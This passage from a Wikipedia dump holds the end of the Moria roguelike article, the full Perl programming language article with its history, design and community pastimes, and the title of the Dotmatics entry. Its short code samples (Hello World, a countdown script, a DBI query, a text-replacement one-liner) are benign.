project, UMoria was relicensed under the GNU General Public License. Jimmey Wayne Todd Jr., a major contributor to VMS Moria, along with Gary D. McAdoo, are not listed as consenting to the relicense. See also List of roguelikes List of open-source video games References External links Umoria.org v5.7 Windows / macOS executables, much historical information, and links to source code. Free Software Magazine - Freeing an old game discusses efforts to relicense UMoria MS-DOS Beej's Moria Page Online VMS/VAX Moria telnet portal RogueBasin Wiki listing of all the different Moria ports and variants. 1983 video games Acorn Archimedes games Amiga games DOS games Linux games Classic Mac OS games Video games based on Middle-earth Roguelike video games Windows games Curses (programming library) Cross-platform software Open-source video games Unix games Video games developed in the United States Video games using procedural generation
23939
https://en.wikipedia.org/wiki/Perl
Perl
Perl is a family of two high-level, general-purpose, interpreted, dynamic programming languages. "Perl" refers to Perl 5, but from 2000 to 2019 it also referred to its redesigned "sister language", Perl 6, before the latter's name was officially changed to Raku in October 2019. Though Perl is not officially an acronym, there are various backronyms in use, including "Practical Extraction and Reporting Language". Perl was developed by Larry Wall in 1987 as a general-purpose Unix scripting language to make report processing easier. Since then, it has undergone many changes and revisions. Raku, which began as a redesign of Perl 5 in 2000, eventually evolved into a separate language. Both languages continue to be developed independently by different development teams and liberally borrow ideas from each other. The Perl languages borrow features from other programming languages including C, sh, AWK, and sed; They provide text processing facilities without the arbitrary data-length limits of many contemporary Unix command line tools. Perl 5 gained widespread popularity in the late 1990s as a CGI scripting language, in part due to its powerful regular expression and string parsing abilities. In addition to CGI, Perl 5 is used for system administration, network programming, finance, bioinformatics, and other applications, such as for GUIs. It has been nicknamed "the Swiss Army chainsaw of scripting languages" because of its flexibility and power, and also its ugliness. In 1998, it was also referred to as the "duct tape that holds the Internet together," in reference to both its ubiquitous use as a glue language and its perceived inelegance. Perl is a highly expressive programming language: source code for a given algorithm can be short and highly compressible. Name Perl was originally named "Pearl". Wall wanted to give the language a short name with positive connotations. Wall discovered the existing PEARL programming language before Perl's official release and changed the spelling of the name. When referring to the language, the name is capitalized: Perl. When referring to the program itself, the name is uncapitalized (perl) because most Unix-like file systems are case-sensitive. Before the release of the first edition of Programming Perl, it was common to refer to the language as perl. Randal L. Schwartz, however, capitalized the language's name in the book to make it stand out better when typeset. This case distinction was subsequently documented as canonical. The name is occasionally expanded as a backronym: Practical Extraction and Report Language and Wall's own Pathologically Eclectic Rubbish Lister which is in the manual page for perl. History Early versions Larry Wall began work on Perl in 1987, while working as a programmer at Unisys, and version 1.0 was released to the comp.sources.unix newsgroup on February 1, 1988. The language expanded rapidly over the next few years. Perl 2, released in 1988, featured a better regular expression engine. Perl 3, released in 1989, added support for binary data streams. Originally, the only documentation for Perl was a single lengthy man page. In 1991, Programming Perl, known to many Perl programmers as the "Camel Book" because of its cover, was published and became the de facto reference for the language. At the same time, the Perl version number was bumped to 4, not to mark a major change in the language but to identify the version that was well documented by the book. 
Early Perl 5 Perl 4 went through a series of maintenance releases, culminating in Perl 4.036 in 1993, whereupon Wall abandoned Perl 4 to begin work on Perl 5. Initial design of Perl 5 continued into 1994. The perl5-porters mailing list was established in May 1994 to coordinate work on porting Perl 5 to different platforms. It remains the primary forum for development, maintenance, and porting of Perl 5. Perl 5.000 was released on October 17, 1994. It was a nearly complete rewrite of the interpreter, and it added many new features to the language, including objects, references, lexical (my) variables, and modules. Importantly, modules provided a mechanism for extending the language without modifying the interpreter. This allowed the core interpreter to stabilize, even as it enabled ordinary Perl programmers to add new language features. Perl 5 has been in active development since then. Perl 5.001 was released on March 13, 1995. Perl 5.002 was released on February 29, 1996 with the new prototypes feature. This allowed module authors to make subroutines that behaved like Perl builtins. Perl 5.003 was released June 25, 1996, as a security release. One of the most important events in Perl 5 history took place outside of the language proper and was a consequence of its module support. On October 26, 1995, the Comprehensive Perl Archive Network (CPAN) was established as a repository for the Perl language and Perl modules; as of May 2017, it carries over 185,178 modules in 35,190 distributions, written by more than 13,071 authors, and is mirrored worldwide at more than 245 locations. Perl 5.004 was released on May 15, 1997, and included, among other things, the UNIVERSAL package, giving Perl a base object from which all classes were automatically derived and the ability to require versions of modules. Another significant development was the inclusion of the CGI.pm module, which contributed to Perl's popularity as a CGI scripting language. Perl 5.004 added support for Microsoft Windows, Plan 9, QNX, and AmigaOS. Perl 5.005 was released on July 22, 1998. This release included several enhancements to the regex engine, new hooks into the backend through the B::* modules, the qr// regex quote operator, a large selection of other new core modules, and added support for several more operating systems, including BeOS. 2000–2020 Perl 5.6 was released on March 22, 2000. Major changes included 64-bit support, Unicode string representation, support for files over 2 GiB, and the "our" keyword. When developing Perl 5.6, the decision was made to switch the versioning scheme to one more similar to other open source projects; after 5.005_63, the next version became 5.5.640, with plans for development versions to have odd numbers and stable versions to have even numbers. In 2000, Wall put forth a call for suggestions for a new version of Perl from the community. The process resulted in 361 RFC (request for comments) documents that were to be used in guiding development of Perl 6. In 2001, work began on the "Apocalypses" for Perl 6, a series of documents meant to summarize the change requests and present the design of the next generation of Perl. They were presented as a digest of the RFCs, rather than a formal document. At this point, Perl 6 existed only as a description of a language. Perl 5.8 was first released on July 18, 2002, and had nearly yearly updates since then. 
Perl 5.8 improved Unicode support, added a new I/O implementation, added a new thread implementation, improved numeric accuracy, and added several new modules. As of 2013 this version still remains the most popular version of Perl and is used by Red Hat 5, Suse 10, Solaris 10, HP-UX 11.31 and AIX 5. In 2004, work began on the "Synopses"documents that originally summarized the Apocalypses, but which became the specification for the Perl 6 language. In February 2005, Audrey Tang began work on Pugs, a Perl 6 interpreter written in Haskell. This was the first concerted effort toward making Perl 6 a reality. This effort stalled in 2006. PONIE is an acronym for Perl On New Internal Engine. The PONIE Project existed from 2003 until 2006 and was to be a bridge between Perl 5 and Perl 6. It was an effort to rewrite the Perl 5 interpreter to run on Parrot, the Perl 6 virtual machine. The goal was to ensure the future of the millions of lines of Perl 5 code at thousands of companies around the world. The PONIE project ended in 2006 and is no longer being actively developed. Some of the improvements made to the Perl 5 interpreter as part of PONIE were folded into that project. On December 18, 2007, the 20th anniversary of Perl 1.0, Perl 5.10.0 was released. Perl 5.10.0 included notable new features, which brought it closer to Perl 6. These included a switch statement (called "given"/"when"), regular expressions updates, and the 'smart match operator (~~). Around this same time, development began in earnest on another implementation of Perl 6 known as Rakudo Perl, developed in tandem with the Parrot virtual machine. As of November 2009, Rakudo Perl has had regular monthly releases and now is the most complete implementation of Perl 6. A major change in the development process of Perl 5 occurred with Perl 5.11; the development community has switched to a monthly release cycle of development releases, with a yearly schedule of stable releases. By that plan, bugfix point releases will follow the stable releases every three months. On April 12, 2010, Perl 5.12.0 was released. Notable core enhancements include new package NAME VERSION syntax, the Yada Yada operator (intended to mark placeholder code that is not yet implemented), implicit strictures, full Y2038 compliance, regex conversion overloading, DTrace support, and Unicode 5.2. On January 21, 2011, Perl 5.12.3 was released; it contains updated modules and some documentation changes. Version 5.12.4 was released on June 20, 2011. The latest version of that branch, 5.12.5, was released on November 10, 2012. On May 14, 2011, Perl 5.14 was released with JSON support built-in. On May 20, 2012, Perl 5.16 was released. Notable new features include the ability to specify a given version of Perl that one wishes to emulate, allowing users to upgrade their version of Perl, but still run old scripts that would normally be incompatible. Perl 5.16 also updates the core to support Unicode 6.1. On May 18, 2013, Perl 5.18 was released. Notable new features include the new dtrace hooks, lexical subs, more CORE:: subs, overhaul of the hash for security reasons, support for Unicode 6.2. On May 27, 2014, Perl 5.20 was released. Notable new features include subroutine signatures, hash slices/new slice syntax, postfix dereferencing (experimental), Unicode 6.3, using consistent random number generator. Some observers credit the release of Perl 5.10 with the start of the Modern Perl movement. 
In particular, this phrase describes a style of development that embraces the use of the CPAN, takes advantage of recent developments in the language, and is rigorous about creating high-quality code. While the book "Modern Perl" may be the most visible standard-bearer of this idea, other groups such as the Enlightened Perl Organization have taken up the cause. In late 2012 and 2013, several projects for alternative implementations of Perl 5 were started: Perl5 in Perl6 by the Rakudo Perl team, one by Stevan Little and friends, one by the Perl11 team under Reini Urban, and others, including a Kickstarter project led by Will Braswell and affiliated with the Perl11 project. 2020 onward In June 2020, Perl 7 was announced as the successor to Perl 5. Perl 7 was to initially be based on Perl 5.32, with a release expected in the first half of 2021 and release candidates sooner. This plan was revised in May 2021, without any release timeframe or version of Perl 5 for use as a baseline specified. When Perl 7 is released, Perl 5 will go into long-term maintenance. Supported Perl 5 versions, however, will continue to get important security and bug fixes. Symbols Camel Programming Perl, published by O'Reilly Media, features a picture of a dromedary camel on the cover and is commonly called the "Camel Book". This image has become an unofficial symbol of Perl as well as a general hacker emblem, appearing on T-shirts and other clothing items. O'Reilly owns the image as a trademark but licenses it for non-commercial use, requiring only an acknowledgement and a link to www.perl.com. Licensing for commercial use is decided on a case-by-case basis. O'Reilly also provides "Programming Republic of Perl" logos for non-commercial sites and "Powered by Perl" buttons for any site that uses Perl. Onion The Perl Foundation owns an alternative symbol, an onion, which it licenses to its subsidiaries, Perl Mongers, PerlMonks, Perl.org, and others. The symbol is a visual pun on pearl onion. Raptor Sebastian Riedel, the creator of Mojolicious, created a logo depicting a raptor dinosaur, which is available under a CC-SA License, Version 4.0. The raptor analogy comes from a series of talks given by Matt S Trout beginning in 2010. Overview According to Wall, Perl has two slogans. The first is "There's more than one way to do it," commonly known as TMTOWTDI. The second slogan is "Easy things should be easy and hard things should be possible". Features The overall structure of Perl derives broadly from C. Perl is procedural in nature, with variables, expressions, assignment statements, brace-delimited blocks, control structures, and subroutines. Perl also takes features from shell programming. All variables are marked with leading sigils, which allow variables to be interpolated directly into strings. However, unlike the shell, Perl uses sigils on all accesses to variables, and unlike most other programming languages that use sigils, the sigil doesn't denote the type of the variable but the type of the expression. So, for example, while an array is denoted by the sigil "@" (for example @arrayname), an individual member of the array is denoted by the scalar sigil "$" (for example $arrayname[3]). Perl also has many built-in functions that provide tools often used in shell programming (although many of these tools are implemented by programs external to the shell), such as sorting, and calling operating system facilities. Perl takes hashes ("associative arrays") from AWK and regular expressions from sed.
These simplify many parsing, text-handling, and data-management tasks. Shared with Lisp is the implicit return of the last value in a block, and all statements are also expressions which can be used in larger expressions themselves. Perl 5 added features that support complex data structures, first-class functions (that is, closures as values), and an object-oriented programming model. These include references, packages, class-based method dispatch, and lexically scoped variables, along with compiler directives (for example, the strict pragma). A major additional feature introduced with Perl 5 was the ability to package code as reusable modules. Wall later stated that "The whole intent of Perl 5's module system was to encourage the growth of Perl culture rather than the Perl core." All versions of Perl do automatic data-typing and automatic memory management. The interpreter knows the type and storage requirements of every data object in the program; it allocates and frees storage for them as necessary using reference counting (so it cannot deallocate circular data structures without manual intervention). Legal type conversions — for example, conversions from number to string — are done automatically at run time; illegal type conversions are fatal errors. Design The design of Perl can be understood as a response to three broad trends in the computer industry: falling hardware costs, rising labor costs, and improvements in compiler technology. Many earlier computer languages, such as Fortran and C, aimed to make efficient use of expensive computer hardware. In contrast, Perl was designed so that computer programmers could write programs more quickly and easily. Perl has many features that ease the task of the programmer at the expense of greater CPU and memory requirements. These include automatic memory management; dynamic typing; strings, lists, and hashes; regular expressions; introspection; and an eval() function. Perl follows the theory of "no built-in limits," an idea similar to the Zero One Infinity rule. Wall was trained as a linguist, and the design of Perl is very much informed by linguistic principles. Examples include Huffman coding (common constructions should be short), good end-weighting (the important information should come first), and a large collection of language primitives. Perl favors language constructs that are concise and natural for humans to write, even where they complicate the Perl interpreter. Perl's syntax reflects the idea that "things that are different should look different." For example, scalars, arrays, and hashes have different leading sigils. Array indices and hash keys use different kinds of braces. Strings and regular expressions have different standard delimiters. This approach can be contrasted with a language such as Lisp, where the same basic syntax, composed of simple and universal symbolic expressions, is used for all purposes. Perl does not enforce any particular programming paradigm (procedural, object-oriented, functional, or others) or even require the programmer to choose among them. There is a broad practical bent to both the Perl language and the community and culture that surround it. The preface to Programming Perl begins: "Perl is a language for getting your job done." One consequence of this is that Perl is not a tidy language. It includes many features, tolerates exceptions to its rules, and employs heuristics to resolve syntactical ambiguities. Because of the forgiving nature of the compiler, bugs can sometimes be hard to find. 
Perl's function documentation remarks on the variant behavior of built-in functions in list and scalar contexts by saying, "In general, they do what you want, unless you want consistency." No written specification or standard for the Perl language exists for Perl versions through Perl 5, and there are no plans to create one for the current version of Perl. There has been only one implementation of the interpreter, and the language has evolved along with it. That interpreter, together with its functional tests, stands as a de facto specification of the language. Perl 6, however, started with a specification, and several projects aim to implement some or all of the specification. Applications Perl has many and varied applications, compounded by the availability of many standard and third-party modules. Perl has chiefly been used to write CGI scripts: large projects written in Perl include cPanel, Slash, Bugzilla, RT, TWiki, and Movable Type; high-traffic websites that use Perl extensively include Priceline.com, Craigslist, IMDb, LiveJournal, DuckDuckGo, Slashdot and Ticketmaster. It is also an optional component of the popular LAMP technology stack for Web development, in lieu of PHP or Python. Perl is used extensively as a system programming language in the Debian Linux distribution. Perl is often used as a glue language, tying together systems and interfaces that were not specifically designed to interoperate, and for "data munging," that is, converting or processing large amounts of data for tasks such as creating reports. In fact, these strengths are intimately linked. The combination makes Perl a popular all-purpose language for system administrators, particularly because short programs, often called "one-liner programs," can be entered and run on a single command line. Perl code can be made portable across Windows and Unix; such code is often used by suppliers of software (both COTS and bespoke) to simplify packaging and maintenance of software build- and deployment-scripts. Perl/Tk and wxPerl are commonly used to add graphical user interfaces to Perl scripts. Implementation Perl is implemented as a core interpreter, written in C, together with a large collection of modules, written in Perl and C. , the interpreter is 150,000 lines of C code and compiles to a 1 MB executable on typical machine architectures. Alternatively, the interpreter can be compiled to a link library and embedded in other programs. There are nearly 500 modules in the distribution, comprising 200,000 lines of Perl and an additional 350,000 lines of C code (much of the C code in the modules consists of character encoding tables). The interpreter has an object-oriented architecture. All of the elements of the Perl language—scalars, arrays, hashes, coderefs, file handles—are represented in the interpreter by C structs. Operations on these structs are defined by a large collection of macros, typedefs, and functions; these constitute the Perl C API. The Perl API can be bewildering to the uninitiated, but its entry points follow a consistent naming scheme, which provides guidance to those who use it. The life of a Perl interpreter divides broadly into a compile phase and a run phase. In Perl, the phases are the major stages in the interpreter's life-cycle. Each interpreter goes through each phase only once, and the phases follow in a fixed sequence. Most of what happens in Perl's compile phase is compilation, and most of what happens in Perl's run phase is execution, but there are significant exceptions. 
Perl makes important use of its capability to execute Perl code during the compile phase. Perl will also delay compilation into the run phase. The terms that indicate the kind of processing that is actually occurring at any moment are compile time and run time. Perl is in compile time at most points during the compile phase, but compile time may also be entered during the run phase. The compile time for code in a string argument passed to the eval built-in occurs during the run phase. Perl is often in run time during the compile phase and spends most of the run phase in run time. Code in BEGIN blocks executes at run time but in the compile phase.
At compile time, the interpreter parses Perl code into a syntax tree. At run time, it executes the program by walking the tree. Text is parsed only once, and the syntax tree is subject to optimization before it is executed, so that execution is relatively efficient. Compile-time optimizations on the syntax tree include constant folding and context propagation, but peephole optimization is also performed.
Perl has a Turing-complete grammar because parsing can be affected by run-time code executed during the compile phase. Therefore, Perl cannot be parsed by a straight Lex/Yacc lexer/parser combination. Instead, the interpreter implements its own lexer, which coordinates with a modified GNU bison parser to resolve ambiguities in the language.
It is often said that "Only perl can parse Perl," meaning that only the Perl interpreter (perl) can parse the Perl language (Perl), but even this is not, in general, true. Because the Perl interpreter can simulate a Turing machine during its compile phase, it would need to decide the halting problem in order to complete parsing in every case. It is a longstanding result that the halting problem is undecidable, and therefore not even perl can always parse Perl. Perl makes the unusual choice of giving the user access to its full programming power in its own compile phase. The cost in terms of theoretical purity is high, but practical inconvenience seems to be rare.
Other programs that undertake to parse Perl, such as source-code analyzers and auto-indenters, have to contend not only with ambiguous syntactic constructs but also with the undecidability of Perl parsing in the general case. Adam Kennedy's PPI project focused on parsing Perl code as a document (retaining its integrity as a document), instead of parsing Perl as executable code (that not even Perl itself can always do). It was Kennedy who first conjectured that "parsing Perl suffers from the 'halting problem'," which was later proved.
Perl is distributed with over 250,000 functional tests for core Perl language and over 250,000 functional tests for core modules. These run as part of the normal build process and extensively exercise the interpreter and its core modules. Perl developers rely on the functional tests to ensure that changes to the interpreter do not introduce software bugs; additionally, Perl users who see that the interpreter passes its functional tests on their system can have a high degree of confidence that it is working properly.
Availability
Perl is dual licensed under both the Artistic License 1.0 and the GNU General Public License. Distributions are available for most operating systems. It is particularly prevalent on Unix and Unix-like systems, but it has been ported to most modern (and many obsolete) platforms.
With only six reported exceptions, Perl can be compiled from source code on all POSIX-compliant, or otherwise-Unix-compatible, platforms. Because of unusual changes required for the classic Mac OS environment, a special port called MacPerl was shipped independently.
The Comprehensive Perl Archive Network carries a complete list of supported platforms with links to the distributions available on each. CPAN is also the source for publicly available Perl modules that are not part of the core Perl distribution.
Windows
Users of Microsoft Windows typically install one of the native binary distributions of Perl for Win32, most commonly Strawberry Perl or ActivePerl. Compiling Perl from source code under Windows is possible, but most installations lack the requisite C compiler and build tools. This also makes it difficult to install modules from the CPAN, particularly those that are partially written in C.
ActivePerl is a closed-source distribution from ActiveState that has regular releases that track the core Perl releases. The distribution previously included the Perl package manager (PPM), a popular tool for installing, removing, upgrading, and managing the use of common Perl modules; however, this tool was discontinued as of ActivePerl 5.28. Included also is PerlScript, a Windows Script Host (WSH) engine implementing the Perl language. Visual Perl is an ActiveState tool that adds Perl to the Visual Studio .NET development suite. A VBScript-to-Perl converter, as well as a Perl compiler for Windows, and converters of awk and sed to Perl have also been produced by this company and included on the ActiveState CD for Windows, which includes all of their distributions plus the Komodo IDE and all but the first on the Unix/Linux/Posix variant thereof in 2002 and subsequently.
Strawberry Perl is an open-source distribution for Windows. It has had regular, quarterly releases since January 2008, including new modules as feedback and requests come in. Strawberry Perl aims to be able to install modules like standard Perl distributions on other platforms, including compiling XS modules.
The Cygwin emulation layer is another way of running Perl under Windows. Cygwin provides a Unix-like environment on Windows, and both Perl and CPAN are available as standard pre-compiled packages in the Cygwin setup program. Since Cygwin also includes gcc, compiling Perl from source is also possible.
A perl executable is included in several Windows Resource Kits in the directory with other scripting tools. Implementations of Perl come with the MKS Toolkit, Interix (the base of earlier implementations of Windows Services for Unix), and UWIN.
Database interfaces
Perl's text-handling capabilities can be used for generating SQL queries; arrays, hashes, and automatic memory management make it easy to collect and process the returned data. For example, in Tim Bunce's Perl DBI application programming interface (API), the arguments to the API can be the text of SQL queries; thus it is possible to program in multiple languages at the same time (e.g., for generating a Web page using HTML, JavaScript, and SQL in a here document). The use of Perl variable interpolation to programmatically customize each of the SQL queries, and the specification of Perl arrays or hashes as the structures to programmatically hold the resulting data sets from each SQL query, allows a high-level mechanism for handling large amounts of data for post-processing by a Perl subprogram.
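The mechanism described in the preceding paragraph can be sketched as follows. This is an illustrative fragment only: it assumes the DBI module and a driver (here DBD::SQLite) are installed, and the database file, table, and column names are invented for the example. The SQL text is built in a here document, with Perl interpolation choosing the column to sort by, a placeholder binding the actual value, and the returned rows collected into an array of hashes for later processing.
#!/usr/bin/perl
use strict;
use warnings;
use DBI;
# 'inventory.db' and the 'parts' table are hypothetical names used only for this sketch.
my $dbh = DBI->connect('dbi:SQLite:dbname=inventory.db', '', '',
                       { RaiseError => 1, AutoCommit => 1 });
my $order_by = 'price';          # interpolated directly into the SQL text
my $min_qty  = 10;               # supplied separately as a bound value
my $sql = <<"END_SQL";
    SELECT name, price, quantity
    FROM   parts
    WHERE  quantity >= ?
    ORDER  BY $order_by
END_SQL
my $sth = $dbh->prepare($sql);
$sth->execute($min_qty);
my @rows;                                     # each row becomes a hash reference
while ( my $row = $sth->fetchrow_hashref ) {
    push @rows, $row;
}
printf "%-20s %8.2f\n", $_->{name}, $_->{price} for @rows;
$dbh->disconnect;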
In early versions of Perl, database interfaces were created by relinking the interpreter with a client-side database library. This was sufficiently difficult that it was done for only a few of the most important and most widely used databases, and it restricted the resulting perl executable to using just one database interface at a time.
In Perl 5, database interfaces are implemented by Perl DBI modules. The DBI (Database Interface) module presents a single, database-independent interface to Perl applications, while the DBD (Database Driver) modules handle the details of accessing some 50 different databases; there are DBD drivers for most ANSI SQL databases. DBI provides caching for database handles and queries, which can greatly improve performance in long-lived execution environments such as mod_perl, helping high-volume systems avert load spikes as in the Slashdot effect.
In modern Perl applications, especially those written using web frameworks such as Catalyst, the DBI module is often used indirectly via object-relational mappers such as DBIx::Class, Class::DBI or Rose::DB::Object that generate SQL queries and handle data transparently to the application author.
Comparative performance
The Computer Language Benchmarks Game compares the performance of implementations of typical programming problems in several programming languages. The submitted Perl implementations typically perform toward the high end of the memory-usage spectrum and give varied speed results. Perl's performance in the benchmarks game is typical for interpreted languages.
Large Perl programs start more slowly than similar programs in compiled languages because perl has to compile the source every time it runs. In a talk at the YAPC::Europe 2005 conference and in his subsequent article "A Timely Start," Jean-Louis Leroy found that his Perl programs took much longer to run than expected because the perl interpreter spent significant time finding modules within his over-large include path. Unlike Java, Python, and Ruby, Perl has only experimental support for pre-compiling. Therefore, Perl programs pay this overhead penalty on every execution. The run phase of typical programs is long enough that amortized startup time is not substantial, but benchmarks that measure very short execution times are likely to be skewed due to this overhead.
A number of tools have been introduced to improve this situation. The first such tool was Apache's mod_perl, which sought to address one of the most common reasons that small Perl programs were invoked rapidly: CGI Web development. ActivePerl, via Microsoft ISAPI, provides similar performance improvements.
Once Perl code is compiled, there is additional overhead during the execution phase that typically isn't present for programs written in compiled languages such as C or C++. Examples of such overhead include bytecode interpretation, reference-counting memory management, and dynamic type-checking.
Optimizing
The most critical routines can be written in other languages (such as C), which can be connected to Perl via simple Inline modules or the more complex, but flexible, XS mechanism.
Perl 5
Perl 5, the language usually referred to as "Perl", continues to be actively developed. Perl 5.12.0 was released in April 2010 with some new features influenced by the design of Perl 6, followed by Perl 5.14.1 (released on June 17, 2011), Perl 5.16.1 (released on August 9, 2012), and Perl 5.18.0 (released on May 18, 2013).
Perl 5 development versions are released on a monthly basis, with major releases coming out once per year. The relative proportion of Internet searches for "Perl programming", as compared with similar searches for other programming languages, steadily declined from about 10% in 2005 to about 2% in 2011, and to about 0.7% in 2020.
Raku (Perl 6)
At the 2000 Perl Conference, Jon Orwant made a case for a major new language initiative. This led to a decision to begin work on a redesign of the language, to be called Perl 6. Proposals for new language features were solicited from the Perl community at large, which submitted more than 300 RFCs.
Wall spent the next few years digesting the RFCs and synthesizing them into a coherent framework for Perl 6. He presented his design for Perl 6 in a series of documents called "apocalypses", numbered to correspond to chapters in Programming Perl. The developing specification of Perl 6 was encapsulated in design documents called Synopses, numbered to correspond to the Apocalypses.
Thesis work by Bradley M. Kuhn, overseen by Wall, considered the possible use of the Java virtual machine as a runtime for Perl. Kuhn's thesis showed this approach to be problematic. In 2001, it was decided that Perl 6 would run on a cross-language virtual machine called Parrot. This would mean that other languages targeting Parrot would gain native access to CPAN, allowing some level of cross-language development.
In 2005, Audrey Tang created the Pugs project, an implementation of Perl 6 in Haskell. This acted as, and continues to act as, a test platform for the Perl 6 language (separate from the development of the actual implementation), allowing the language designers to explore. The Pugs project spawned an active Perl/Haskell cross-language community centered around the Libera Chat #raku IRC channel. Many functional programming influences were absorbed by the Perl 6 design team.
In 2012, Perl 6 development was centered primarily on two compilers:
Rakudo, an implementation running on the Parrot virtual machine and the Java virtual machine.
Niecza, which targets the Common Language Runtime.
In 2013, MoarVM ("Metamodel On A Runtime"), a C language-based virtual machine designed primarily for Rakudo, was announced. In October 2019, Perl 6 was renamed to Raku. Only the Rakudo implementation and MoarVM remain under active development; other virtual machines, such as the Java Virtual Machine and JavaScript, are supported as targets.
Perl 7
Perl 7 was announced on 24 June 2020 at "The Perl Conference in the Cloud" as the successor to Perl 5. Based on Perl 5.32, Perl 7 is designed to be backward compatible with modern Perl 5 code; Perl 5 code without the boilerplate (pragma) headers would need to add use compat::perl5; to stay compatible, while modern code can drop some of the boilerplate.
Perl community
Perl's culture and community have developed alongside the language itself. Usenet was the first public venue in which Perl was introduced, but over the course of its evolution, Perl's community was shaped by the growth of broadening Internet-based services, including the introduction of the World Wide Web. The community that surrounds Perl was, in fact, the topic of Wall's first "State of the Onion" talk.
State of the Onion
State of the Onion is the name for Wall's yearly keynote-style summaries on the progress of Perl and its community.
They are characterized by his hallmark humor, employing references to Perl's culture, the wider hacker culture, Wall's linguistic background, sometimes his family life, and occasionally even his Christian background. Each talk is first given at various Perl conferences and is eventually also published online.
Perl pastimes
JAPHs
In email, Usenet, and message board postings, "Just another Perl hacker" (JAPH) programs are a common trend, originated by Randal L. Schwartz, one of the earliest professional Perl trainers. In the parlance of Perl culture, Perl programmers are known as Perl hackers, and from this derives the practice of writing short programs to print out the phrase "Just another Perl hacker". In the spirit of the original concept, these programs are moderately obfuscated and short enough to fit into the signature of an email or Usenet message. The "canonical" JAPH as developed by Schwartz includes the comma at the end, although this is often omitted.
Perl golf
Perl "golf" is the pastime of reducing the number of characters (key "strokes") used in a Perl program to the bare minimum, much in the same way that golf players seek to take as few shots as possible in a round. The phrase's first use emphasized the difference between pedestrian code meant to teach a newcomer and terse hacks likely to amuse experienced Perl programmers, an example of the latter being JAPHs that were already used in signatures in Usenet postings and elsewhere. Similar stunts had been an unnamed pastime in the language APL in previous decades. The use of Perl to write a program that performed RSA encryption prompted a widespread and practical interest in this pastime. In subsequent years, the term "code golf" has been applied to the pastime in other languages. A Perl Golf Apocalypse was held at Perl Conference 4.0 in Monterey, California in July 2000.
Obfuscation
As with C, obfuscated code competitions were a well-known pastime in the late 1990s. The Obfuscated Perl Contest was a competition held by The Perl Journal from 1996 to 2000 that made an arch virtue of Perl's syntactic flexibility. Awards were given for categories such as "most powerful" (programs that made efficient use of space) and "best four-line signature" for programs that fit into four lines of 76 characters in the style of a Usenet signature block.
Poetry
Perl poetry is the practice of writing poems that can be compiled as legal Perl code, for example the piece known as Black Perl. Perl poetry is made possible by the large number of English words that are used in the Perl language. New poems are regularly submitted to the community at PerlMonks.
Perl on IRC
A number of IRC channels offer support for Perl and some of its modules.
CPAN Acme
There are also many examples of code written purely for entertainment on the CPAN. Lingua::Romana::Perligata, for example, allows writing programs in Latin. Upon execution of such a program, the module translates its source code into regular Perl and runs it. The Perl community has set aside the "Acme" namespace for modules that are fun in nature (but its scope has widened to include exploratory or experimental code or any other module that is not meant to ever be used in production). Some of the Acme modules are deliberately implemented in amusing ways. This includes Acme::Bleach, one of the first modules in the Acme:: namespace, which allows the program's source code to be "whitened" (i.e., all characters replaced with whitespace) and yet still work.
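Returning to the JAPH tradition described above, the classic form is a single statement, and golfed or lightly obfuscated variants build on it. The two lines below are illustrative examples written for this article rather than historical signatures: the first is the plain canonical phrase (with Schwartz's trailing comma), and the second assembles the same text from a word list.
print "Just another Perl hacker,";                       # the canonical phrase, comma included
print join(" ", qw(Just another Perl hacker)) . ",\n";   # the same text assembled from a word list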
Example code
In older versions of Perl, one would write the Hello World program as:
print "Hello, World!\n";
Here is a more complex Perl program that counts down seconds from a given starting value:
#!/usr/bin/perl
use strict;
use warnings;
my ( $remaining, $total );
$remaining = $total = shift(@ARGV);
STDOUT->autoflush(1);
while ( $remaining ) {
    printf ( "Remaining %s/%s \r", $remaining--, $total );
    sleep 1;
}
print "\n";
The perl interpreter can also be used for one-off scripts on the command line. The following example (as invoked from an sh-compatible shell, such as Bash) translates the string "Bob" in all files ending with .txt in the current directory to "Robert":
$ perl -i.bak -lp -e 's/Bob/Robert/g' *.txt
Criticism
Perl has been referred to as "line noise" and a write-only language by its critics. The earliest such mention was in the first edition of the book Learning Perl, a Perl 4 tutorial book written by Randal L. Schwartz, in the first chapter of which he states: "Yes, sometimes Perl looks like line noise to the uninitiated, but to the seasoned Perl programmer, it looks like checksummed line noise with a mission in life." He also stated that the accusation that Perl is a write-only language could be avoided by coding with "proper care". The Perl overview document states that the names of built-in "magic" scalar variables "look like punctuation or line noise"; however, the English module provides both long and short English alternatives. Perl's documentation also states that line noise in regular expressions could be mitigated by using the /x modifier to add whitespace.
According to the Perl 6 FAQ, Perl 6 was designed to mitigate "the usual suspects" that elicit the "line noise" claim from Perl 5 critics, including the removal of "the majority of the punctuation variables" and the sanitization of the regex syntax. The Perl 6 FAQ also states that what is sometimes referred to as Perl's line noise is "the actual syntax of the language", just as gerunds and prepositions are a part of the English language. In a December 2012 blog posting, despite claiming that "Rakudo Perl 6 has failed and will continue to fail unless it gets some adult supervision", chromatic stated that the design of Perl 6 has a "well-defined grammar" as well as an "improved type system, a unified object system with an intelligent metamodel, metaoperators, and a clearer system of context that provides for such niceties as pervasive laziness". He also stated that "Perl 6 has a coherence and a consistency that Perl 5 lacks."
See also
Outline of Perl
Perl Data Language
Perl Object Environment
Plain Old Documentation
References
Further reading
Learning Perl 6th Edition (2011), O'Reilly. Beginner-level introduction to Perl.
Beginning Perl 1st Edition (2012), Wrox. A beginner's tutorial for those new to programming or just new to Perl.
Modern Perl 2nd Edition (2012), Onyx Neon. Describes Modern Perl programming techniques.
Programming Perl 4th Edition (2012), O'Reilly. The definitive Perl reference.
Effective Perl Programming 2nd Edition (2010), Addison-Wesley. Intermediate- to advanced-level guide to writing idiomatic Perl.
Perl Cookbook. Practical Perl programming examples.
Functional programming techniques in Perl.
External links American inventions Programming languages C programming language family Cross-platform software Dynamic programming languages Dynamically typed programming languages Free compilers and interpreters Free software programmed in C High-level programming languages Multi-paradigm programming languages Object-oriented programming languages Procedural programming languages Programming languages created in 1987 Scripting languages Software using the Artistic license Text-oriented programming languages Unix programming tools Articles with example Perl code
35187583
https://en.wikipedia.org/wiki/Dotmatics
Dotmatics
